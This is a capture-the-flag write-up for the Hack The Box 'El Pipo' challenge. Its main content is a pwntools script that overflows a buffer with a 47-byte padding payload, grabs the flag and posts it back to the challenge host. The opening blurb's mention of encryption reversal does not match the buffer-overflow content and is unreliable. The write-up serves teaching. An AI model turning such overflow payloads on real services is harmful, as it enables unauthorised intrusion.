HackTheBox El Pipo Writeup
Explore the basics of cybersecurity in the El Pipo Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
import requests
import json
context.log_level = 'debug'
def get_process(host, port):
try:
return remote(host, int(port))
except IndexError:
print(f'Usage: python {sys.argv[0]} <ip:port>')
exit(1)
def exploit(p, host, port):
try:
offset = 47
payload = flat([
b'A' * offset,
b'\x00'
])
p.sendline(payload)
flag = p.recvall().decode()
log.success(f'Output: {flag}')
url = f'http://{host}:{port}/process'
headers = {
'Content-Type': 'application/json',
}
data = {'userInput': flag}
response = requests.post(url, headers=headers, data=json.dumps(data))
log.info(f'Server response: {response.status_code} - {response.text}')
except EOFError as e:
log.error(f"EOF Error: {e}")
except Exception as e:
log.error(f"Error: {e}")
finally:
p.close()
if __name__ == "__main__":
host, port = sys.argv[1].split(':')
p = get_process(host, port)
exploit(p, host, port)
Summary
The El Pipo Challenge on Hack The Box is a very-easy-level pwn challenge that introduces buffer overflow exploitation. The challenge involves sending a carefully crafted payload to overflow a buffer and retrieve a flag. After exploiting the vulnerability, the flag is sent to a remote server using an HTTP POST request. This challenge is ideal for beginners to get hands-on experience with basic buffer overflow attacks and remote communication techniques.
This post is licensed under CC BY 4.0 by the author.